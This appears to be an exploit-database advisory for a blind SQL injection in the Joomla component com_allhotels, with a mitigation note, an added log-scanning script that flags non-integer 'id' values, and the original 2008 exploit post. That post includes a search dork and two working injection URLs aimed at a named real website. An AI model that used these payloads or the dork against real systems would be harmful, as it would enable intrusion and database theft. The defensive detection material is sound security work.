vendor: com_allhotels
by: Hussin X
CVSS: 7.5 HIGH
CWE: 89 (SQL Injection)
Product Name: com_allhotels
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability

The Joomla component com_allhotels is vulnerable to blind SQL injection through the 'id' parameter of the 'index.php' script. An attacker can inject arbitrary SQL code into this parameter to manipulate the application's SQL queries, gain access to the database and potentially gain access to sensitive information.

Mitigation:

Validate input before it is used in SQL queries to prevent SQL injection attacks. The application should also be configured to connect to the database with the least privileged user account.
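As an added example (not part of the advisory and not the component's own code), the script below applies a strict-integer rule for `id` to web-server access logs and flags com_allhotels requests whose `id` is anything other than a plain number. The combined log format, the 10-digit limit, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request field of a combined-format access log: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate hotel id is a short run of decimal digits.
STRICT_INT = re.compile(r"[0-9]{1,10}")

def check_request(target):
    """Return None when the request is not for com_allhotels or every id is a
    plain integer; otherwise return the URL-decoded offending id value."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("option", [""])[-1].lower() != "com_allhotels":
        return None
    for value in query.get("id", []):  # check every occurrence of id
        if not STRICT_INT.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, offending_id) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = check_request(m.group(1))
        if bad is not None:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
_BASE = "/index.php?option=com_allhotels&task=showhoteldetails"
SAMPLE_LOG = [
    f'198.51.100.7 - - [23/Dec/2008:10:00:01 +0000] "GET {_BASE}&id=1 HTTP/1.1" 200 5120',
    f'203.0.113.9 - - [23/Dec/2008:10:00:05 +0000] "GET {_BASE}&id=1+and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    f'203.0.113.9 - - [23/Dec/2008:10:00:06 +0000] "GET {_BASE}&id=1+and%20substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Dec/2008:10:00:09 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tnon-integer id: {value!r}")
```

The same `STRICT_INT` rule is what server-side validation of `id` would enforce before the value reaches a query; here it is only used to review requests after the fact.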

Exploit-DB raw data:

Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/

DorK : inurl:index.php?option=com_allhotels

Demo :
_______


http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________

 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

# milw0rm.com [2008-12-23]